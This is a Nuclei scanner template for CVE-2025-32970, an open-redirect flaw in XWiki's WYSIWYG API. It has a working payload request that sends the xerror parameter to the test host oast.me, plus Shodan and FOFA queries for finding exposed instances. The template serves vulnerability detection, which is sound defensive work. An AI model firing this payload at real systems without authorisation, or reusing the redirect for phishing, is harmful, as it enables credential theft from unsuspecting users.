id: CVE-2025-32970

info:
  name: XWiki WYSIWYG API - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    A vulnerability in XWiki's WYSIWYG API allows an attacker to redirect users to arbitrary external URLs through the xerror parameter. This could be used in phishing attacks to redirect users to malicious websites.
  impact: |
    Attackers can redirect users to malicious external websites through the xerror parameter, potentially enabling phishing attacks and credential theft.
  remediation: |
    Upgrade to the latest XWiki version that properly validates redirect URLs in the WYSIWYG API.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pjhg-9wr9-rj96
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32970
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-601
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,redirect,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/xwiki/bin/view/Main/?foo=bar&foo_syntax=invalid&RequiresHTMLConversion=foo&xerror=https://oast.me"

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'

      - type: word
        part: header
        words:
          - text/javascript
# digest: 4b0a00483046022100a169224adb5b55c4949e10de1b531c009c3361616091b6a0a5588f9ec395e903022100eaa7557ddf922a3e27377202c3088ead8ccace7dc7784bb7a827fffba4d772e1:922c64590222798bb761d5b6d8e72950